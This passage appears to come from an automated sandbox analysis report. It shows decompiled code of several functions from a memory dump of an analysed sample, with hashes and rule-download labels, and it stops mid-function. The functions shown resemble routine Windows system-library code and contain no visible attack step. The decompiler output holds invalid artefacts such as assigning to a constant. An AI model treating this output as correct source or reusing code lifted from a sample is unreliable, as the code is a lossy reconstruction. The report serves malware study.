                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E010903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x115d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01090548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E010AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0107B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1157c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01087D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01087D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E010E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E010A9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E010E69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1157c04 != 0) {
						_t118 = _v12;
						_t120 = E010EA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1157bd8;
						if( *0x1157bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E010A95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E010A99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E010E3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0106B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E010AAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1158474 - 3;
										if( *0x1158474 != 3) {
											 *0x11579dc =  *0x11579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01087D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01087D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E010E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1158708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1157b00; // 0x0
							asm("ror esi, cl");
							 *0x115b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E010A95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01077F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                            0x010903f1
                                                                                                            0x010903f7
                                                                                                            0x010903f9
                                                                                                            0x010903fb
                                                                                                            0x010903fd
                                                                                                            0x01090400
                                                                                                            0x0109040a
                                                                                                            0x010d4c7a
                                                                                                            0x01090537
                                                                                                            0x01090547
                                                                                                            0x01090410
                                                                                                            0x01090410
                                                                                                            0x01090414
                                                                                                            0x01090417
                                                                                                            0x0109041a
                                                                                                            0x01090421
                                                                                                            0x01090424
                                                                                                            0x0109042b
                                                                                                            0x0109043b
                                                                                                            0x0109043e
                                                                                                            0x0109043f
                                                                                                            0x0109043f
                                                                                                            0x01090446
                                                                                                            0x01090449
                                                                                                            0x0109044c
                                                                                                            0x0109044f
                                                                                                            0x01090459
                                                                                                            0x010d4c8d
                                                                                                            0x0109045f
                                                                                                            0x0109045f
                                                                                                            0x0109045f
                                                                                                            0x01090467
                                                                                                            0x010d4c97
                                                                                                            0x010d4c9d
                                                                                                            0x010d4ca4
                                                                                                            0x010d4caa
                                                                                                            0x010d4caf
                                                                                                            0x010d4cb1
                                                                                                            0x010d4cc3
                                                                                                            0x010d4cb3
                                                                                                            0x010d4cbc
                                                                                                            0x010d4cbc
                                                                                                            0x010d4cc8
                                                                                                            0x010d4ccb
                                                                                                            0x010d4cd7
                                                                                                            0x010d4cda
                                                                                                            0x010d4cdf
                                                                                                            0x010d4cdf
                                                                                                            0x010d4ccb
                                                                                                            0x010d4ca4
                                                                                                            0x0109046d
                                                                                                            0x0109046f
                                                                                                            0x0109046f
                                                                                                            0x01090471
                                                                                                            0x01090476
                                                                                                            0x0109047a
                                                                                                            0x0109047b
                                                                                                            0x01090483
                                                                                                            0x01090489
                                                                                                            0x0109048d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4ce9
                                                                                                            0x010d4cef
                                                                                                            0x010d4d22
                                                                                                            0x010d4d22
                                                                                                            0x00000000
                                                                                                            0x010d4d22
                                                                                                            0x010d4cf1
                                                                                                            0x010d4cf7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4cf9
                                                                                                            0x010d4cff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d05
                                                                                                            0x010d4d07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d0d
                                                                                                            0x010d4d0f
                                                                                                            0x010d4d14
                                                                                                            0x010d4d16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d1c
                                                                                                            0x010d4d1c
                                                                                                            0x01090499
                                                                                                            0x01090535
                                                                                                            0x01090535
                                                                                                            0x00000000
                                                                                                            0x01090535
                                                                                                            0x010904a6
                                                                                                            0x010d4d2c
                                                                                                            0x010d4d37
                                                                                                            0x010d4d39
                                                                                                            0x010d4d3b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d41
                                                                                                            0x010d4d48
                                                                                                            0x01090527
                                                                                                            0x0109052b
                                                                                                            0x0109052d
                                                                                                            0x01090530
                                                                                                            0x01090530
                                                                                                            0x00000000
                                                                                                            0x0109052b
                                                                                                            0x010d4d4e
                                                                                                            0x010904ac
                                                                                                            0x010904ac
                                                                                                            0x010904af
                                                                                                            0x010904b2
                                                                                                            0x010904b7
                                                                                                            0x010904b9
                                                                                                            0x010904bb
                                                                                                            0x010904bd
                                                                                                            0x010904bf
                                                                                                            0x010904c5
                                                                                                            0x010904c9
                                                                                                            0x010d4d53
                                                                                                            0x010d4d59
                                                                                                            0x010d4db9
                                                                                                            0x010d4dba
                                                                                                            0x010d4dbf
                                                                                                            0x010d4dc2
                                                                                                            0x010d4dc4
                                                                                                            0x010d4dc7
                                                                                                            0x010d4dce
                                                                                                            0x00000000
                                                                                                            0x010d4dce
                                                                                                            0x010d4d5b
                                                                                                            0x010d4d61
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d63
                                                                                                            0x010d4d69
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d6b
                                                                                                            0x010d4d6e
                                                                                                            0x010d4d74
                                                                                                            0x010d4d76
                                                                                                            0x010d4d7c
                                                                                                            0x010d4d7e
                                                                                                            0x010d4d84
                                                                                                            0x010d4d89
                                                                                                            0x010d4d8c
                                                                                                            0x010d4d8d
                                                                                                            0x010d4d92
                                                                                                            0x010d4d95
                                                                                                            0x010d4d96
                                                                                                            0x010d4d98
                                                                                                            0x010d4d9a
                                                                                                            0x010d4d9f
                                                                                                            0x010d4da4
                                                                                                            0x010d4da6
                                                                                                            0x010d4da8
                                                                                                            0x010d4daf
                                                                                                            0x010d4db1
                                                                                                            0x010d4db1
                                                                                                            0x010d4daf
                                                                                                            0x010d4da6
                                                                                                            0x010d4d84
                                                                                                            0x010d4d7c
                                                                                                            0x00000000
                                                                                                            0x010d4d74
                                                                                                            0x010904d6
                                                                                                            0x010d4de1
                                                                                                            0x010904dc
                                                                                                            0x010904dc
                                                                                                            0x010904dc
                                                                                                            0x010904e4
                                                                                                            0x010d4deb
                                                                                                            0x010d4df1
                                                                                                            0x010d4df8
                                                                                                            0x010d4dfe
                                                                                                            0x010d4e03
                                                                                                            0x010d4e05
                                                                                                            0x010d4e17
                                                                                                            0x010d4e07
                                                                                                            0x010d4e10
                                                                                                            0x010d4e10
                                                                                                            0x010d4e1c
                                                                                                            0x010d4e1f
                                                                                                            0x010d4e35
                                                                                                            0x010d4e35
                                                                                                            0x010d4e1f
                                                                                                            0x010d4df8
                                                                                                            0x010904f1
                                                                                                            0x010904fa
                                                                                                            0x010d4e3f
                                                                                                            0x010d4e47
                                                                                                            0x010d4e5b
                                                                                                            0x010d4e61
                                                                                                            0x010d4e67
                                                                                                            0x010d4e69
                                                                                                            0x010d4e71
                                                                                                            0x010d4e73
                                                                                                            0x01090500
                                                                                                            0x01090500
                                                                                                            0x01090500
                                                                                                            0x010904fa
                                                                                                            0x01090508
                                                                                                            0x0109051d
                                                                                                            0x0109051d
                                                                                                            0x0109051f
                                                                                                            0x01090524
                                                                                                            0x00000000
                                                                                                            0x01090524
                                                                                                            0x01090515
                                                                                                            0x01090517
                                                                                                            0x010d4e7a
                                                                                                            0x010d4e7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4e85
                                                                                                            0x00000000
                                                                                                            0x010d4e85
                                                                                                            0x00000000
                                                                                                            0x01090517

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 946cc6a63f4f428503956d4d224929a27a45e3a85c1cf0e7b04811dafad8a61a
                                                                                                            • Instruction ID: f72ee230542c191ce829b4c75aa949eb4203e26403a9ae772756d6938cebe3fd
                                                                                                            • Opcode Fuzzy Hash: 946cc6a63f4f428503956d4d224929a27a45e3a85c1cf0e7b04811dafad8a61a
                                                                                                            • Instruction Fuzzy Hash: C191F771E00315EFEF21AA6CC854BAE7BE8AB05714F0502A1F9E1EB6D5DB749D40C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106C600 Relevance: .2, Instructions: 225COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0106C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x115d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01076D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E010AB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1157b9c; // 0x0
					_t74 = L01084620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E010A9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L010877F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E010AF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E010A13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L010877F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E010A9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                            0x0106c608
                                                                                                            0x0106c615
                                                                                                            0x0106c625
                                                                                                            0x0106c62d
                                                                                                            0x0106c635
                                                                                                            0x0106c640
                                                                                                            0x0106c680
                                                                                                            0x0106c687
                                                                                                            0x0106c688
                                                                                                            0x0106c689
                                                                                                            0x0106c694
                                                                                                            0x0106c694
                                                                                                            0x0106c642
                                                                                                            0x0106c64a
                                                                                                            0x0106c697
                                                                                                            0x010d7a25
                                                                                                            0x010d7a2b
                                                                                                            0x010d7a2e
                                                                                                            0x010d7a30
                                                                                                            0x010d7bea
                                                                                                            0x010d7bea
                                                                                                            0x00000000
                                                                                                            0x010d7bea
                                                                                                            0x010d7a36
                                                                                                            0x010d7a43
                                                                                                            0x010d7a48
                                                                                                            0x010d7a4c
                                                                                                            0x010d7a4e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7a58
                                                                                                            0x010d7a5a
                                                                                                            0x010d7a5b
                                                                                                            0x010d7a5c
                                                                                                            0x010d7a5d
                                                                                                            0x010d7a63
                                                                                                            0x010d7a64
                                                                                                            0x010d7a6a
                                                                                                            0x010d7a6c
                                                                                                            0x010d7a6e
                                                                                                            0x010d79cb
                                                                                                            0x010d79cb
                                                                                                            0x010d79ce
                                                                                                            0x010d79d0
                                                                                                            0x010d7a98
                                                                                                            0x010d7a9b
                                                                                                            0x010d7a9b
                                                                                                            0x010d7a9e
                                                                                                            0x010d7aa1
                                                                                                            0x010d7bbe
                                                                                                            0x010d7bbe
                                                                                                            0x010d7bc0
                                                                                                            0x010d7be0
                                                                                                            0x010d7be0
                                                                                                            0x010d7a01
                                                                                                            0x010d7a01
                                                                                                            0x010d7a05
                                                                                                            0x010d7a07
                                                                                                            0x010d7a15
                                                                                                            0x010d7a15
                                                                                                            0x010d7a1a
                                                                                                            0x00000000
                                                                                                            0x010d7a1a
                                                                                                            0x010d7bc2
                                                                                                            0x010d7bc6
                                                                                                            0x010d7bc9
                                                                                                            0x010d7bcd
                                                                                                            0x010d7bcf
                                                                                                            0x010d79e6
                                                                                                            0x010d79e6
                                                                                                            0x010d79eb
                                                                                                            0x010d79eb
                                                                                                            0x010d79ef
                                                                                                            0x010d79f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d79f3
                                                                                                            0x010d79f5
                                                                                                            0x010d79ff
                                                                                                            0x010d79ff
                                                                                                            0x00000000
                                                                                                            0x010d79ff
                                                                                                            0x010d79f7
                                                                                                            0x010d79fd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d79fd
                                                                                                            0x010d7bd5
                                                                                                            0x010d7bd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7ba9
                                                                                                            0x010d7bac
                                                                                                            0x010d7bb0
                                                                                                            0x010d7bb1
                                                                                                            0x010d7bb1
                                                                                                            0x010d7bb6
                                                                                                            0x00000000
                                                                                                            0x010d7bb6
                                                                                                            0x010d7aa7
                                                                                                            0x010d7aaa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7ab2
                                                                                                            0x010d7ab3
                                                                                                            0x010d7ab5
                                                                                                            0x010d7aec
                                                                                                            0x010d7aef
                                                                                                            0x010d7b25
                                                                                                            0x010d7b28
                                                                                                            0x010d7b62
                                                                                                            0x010d7b64
                                                                                                            0x010d7b8f
                                                                                                            0x010d7b92
                                                                                                            0x010d7b96
                                                                                                            0x010d7b98
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7b9e
                                                                                                            0x010d7b9f
                                                                                                            0x010d7ba3
                                                                                                            0x00000000
                                                                                                            0x010d7ba3
                                                                                                            0x010d7b66
                                                                                                            0x010d7b68
                                                                                                            0x010d7ae2
                                                                                                            0x010d7ae2
                                                                                                            0x00000000
                                                                                                            0x010d7ae2
                                                                                                            0x010d7b6e
                                                                                                            0x010d7b72
                                                                                                            0x010d7b75
                                                                                                            0x010d7b81
                                                                                                            0x010d7b85
                                                                                                            0x010d7b87
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7b31
                                                                                                            0x010d7b34
                                                                                                            0x010d7b3c
                                                                                                            0x010d7b45
                                                                                                            0x010d7b46
                                                                                                            0x010d7b4f
                                                                                                            0x010d7b51
                                                                                                            0x010d7b57
                                                                                                            0x010d7b59
                                                                                                            0x010d7b59
                                                                                                            0x00000000
                                                                                                            0x010d7b59
                                                                                                            0x010d7b77
                                                                                                            0x00000000
                                                                                                            0x010d7b77
                                                                                                            0x010d7b2a
                                                                                                            0x00000000
                                                                                                            0x010d7b2a
                                                                                                            0x010d7af1
                                                                                                            0x010d7af3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7afb
                                                                                                            0x010d7afc
                                                                                                            0x010d7afe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7b00
                                                                                                            0x010d7b03
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7b05
                                                                                                            0x010d7b09
                                                                                                            0x010d7b0d
                                                                                                            0x010d7b0f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7b18
                                                                                                            0x010d7b1d
                                                                                                            0x00000000
                                                                                                            0x010d7b1d
                                                                                                            0x010d7ab7
                                                                                                            0x010d7ab9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7abf
                                                                                                            0x010d7ac1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7ac3
                                                                                                            0x010d7ac6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7ac8
                                                                                                            0x010d7acc
                                                                                                            0x010d7ad0
                                                                                                            0x010d7ad2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7adb
                                                                                                            0x00000000
                                                                                                            0x010d7adb
                                                                                                            0x010d79d6
                                                                                                            0x010d79d9
                                                                                                            0x010d79dc
                                                                                                            0x010d7a91
                                                                                                            0x010d7a94
                                                                                                            0x00000000
                                                                                                            0x010d7a94
                                                                                                            0x010d79e2
                                                                                                            0x00000000
                                                                                                            0x010d79e2
                                                                                                            0x010d7a74
                                                                                                            0x010d7a7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7a8a
                                                                                                            0x010d7a21
                                                                                                            0x010d7a21
                                                                                                            0x00000000
                                                                                                            0x010d7a21
                                                                                                            0x0106c650
                                                                                                            0x0106c651
                                                                                                            0x0106c656
                                                                                                            0x0106c65c
                                                                                                            0x0106c65d
                                                                                                            0x0106c663
                                                                                                            0x0106c664
                                                                                                            0x0106c66a
                                                                                                            0x0106c66e
                                                                                                            0x010d79c5
                                                                                                            0x010d79c7
                                                                                                            0x00000000
                                                                                                            0x010d79c7
                                                                                                            0x0106c67a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f65785d763469b43088a3df32fcd9d445ccc129a7898c39cca97235adc085ef
                                                                                                            • Instruction ID: ff5618390b6f28e911b493b4030a5f7176aa34d75773fd3ca89737e6bc056995
                                                                                                            • Opcode Fuzzy Hash: 4f65785d763469b43088a3df32fcd9d445ccc129a7898c39cca97235adc085ef
                                                                                                            • Instruction Fuzzy Hash: 988193766043028BDB66CE58C880B6EB7E4FB84258F15486AFEC59B245D330DD40CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010FB8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 39%
                                                                                                            			E010FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1157b9c; // 0x0
				_t124 = L01084620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E010A9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
